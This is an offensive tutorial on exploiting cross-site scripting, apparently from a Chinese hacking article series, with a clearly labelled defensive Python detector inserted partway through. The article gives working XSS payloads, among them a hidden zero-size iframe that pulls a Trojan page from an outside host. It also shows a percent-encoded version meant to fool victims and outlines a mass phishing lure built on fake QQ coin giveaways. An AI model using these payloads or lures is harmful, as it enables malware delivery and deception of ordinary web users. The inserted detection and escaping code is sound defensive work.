SQL injection is like a powerful sword thrust straight into the target's chest: sharp and direct. Next, let's look at cross-site scripting. I compare it to a gentle killer with a dagger hidden behind her back.
Introduction: How to think about exploiting cross-site scripting
SQL injection is aimed directly at systems with SQL injection vulnerabilities, so the target is very clear. The target of cross-site scripting is the client: the visitor. This is what makes it stealthy.
How should we think about exploiting a cross-site vulnerability?
Looking at it from the visitor's side shows how much power this gentle killer has.
1. Stealing cookie information through document.cookie
2. Unauthorized privilege escalation
3. Planting Trojans
4. Indirect damage (killing with a borrowed knife)
--------------------------------------------------------------------------------------
The first is the most common exploitation method. The second is mainly a trap set for website administrators, and it can be used effectively only when the program's source code has been obtained. The third is also common. The fourth may not be obvious, so here is an example:
Assume that www.wang1.cn has a Cross-Site vulnerability.
The vulnerable page is thead.php.
Constructed URL: http://www.wang1.cn/thead.php?id=<script>alert("You got it!")</script>
When we send this URL to someone else, they will get a pop-up box.
Malicious use: we set up a web Trojan page at http://www.mama.com/index.htm
So we construct: http://www.wang1.cn/thead.php?id=<iframe src=http://www.mama.com/index.htm width=0 height=0></iframe>
Now anyone who visits this address is served our page.
In fact, the deception can be made harder to spot by URL-encoding the payload:
http://www.wang1.cn/thead.php?id=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2f%2f%77%77%77%2e%6D%61%6D%61%2e%63%6f%6D%2f%69%6e%64%65%78%2e%68%74%6D%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2f%69%66%72%61%6D%65%3E
Faced with this, the average person really cannot tell what the link does.
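Re-encoding changes only how the link looks to a person; once decoded, the parameter carries the same markup. The following is an added example, not part of the original article, showing the defender's side for the thead.php case: decode the query string (even when encoded twice), flag markup in it, validate the id as a number, and HTML-encode anything echoed back. The function names and sample URLs are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

TAG = re.compile(r"<\s*/?\s*[A-Za-z]")        # start of any HTML tag
PAGE = "http://www.wang1.cn/thead.php?id="    # vulnerable page named in the text
PAYLOAD = '<script>alert("You got it!")</script>'

# Constructed samples: plain, fully percent-encoded, double-encoded, benign.
ENCODED = "".join("%%%02X" % b for b in PAYLOAD.encode())
SAMPLES = [PAGE + PAYLOAD, PAGE + ENCODED, PAGE + quote(ENCODED, safe=""), PAGE + "42"]

def decoded_params(url, max_rounds=3):
    """Query parameters with percent-encoding removed, even if applied twice."""
    params = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for _ in range(max_rounds):           # parse_qsl already decoded once
            once_more = unquote(value)
            if once_more == value:
                break
            value = once_more
        params[name] = value
    return params

def markup_params(url):
    """Detection: names of parameters whose decoded value contains a tag."""
    return [n for n, v in decoded_params(url).items() if TAG.search(v)]

def thread_id(value):
    """Input validation: the id must be a short decimal number, else None."""
    return int(value) if re.fullmatch(r"[0-9]{1,10}", value) else None

def echo(value):
    """Output encoding: what the page should emit if it must echo the value."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for url in SAMPLES:
        value = decoded_params(url)["id"]
        print(markup_params(url), thread_id(value), echo(value))
```

The three hostile samples are all flagged and rejected by the numeric check, and the escaped output contains no live tag; only the benign id passes.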
Question:
Who would trust you enough to open a URL you gave them directly?
Answer:
Trust is built on a basic sense of a secure environment.
Suppose the URL starts with http://www.163.com or www.qq.com... would you still be suspicious?
If we build such a page, announce that QQ is running a promotion and giving away Q coins, and then send out a large number of specially crafted URLs, how many people will fall for it?
In the next few articles, I will demonstrate the applications of cross-site techniques one by one. Of course, you are also welcome to submit an article.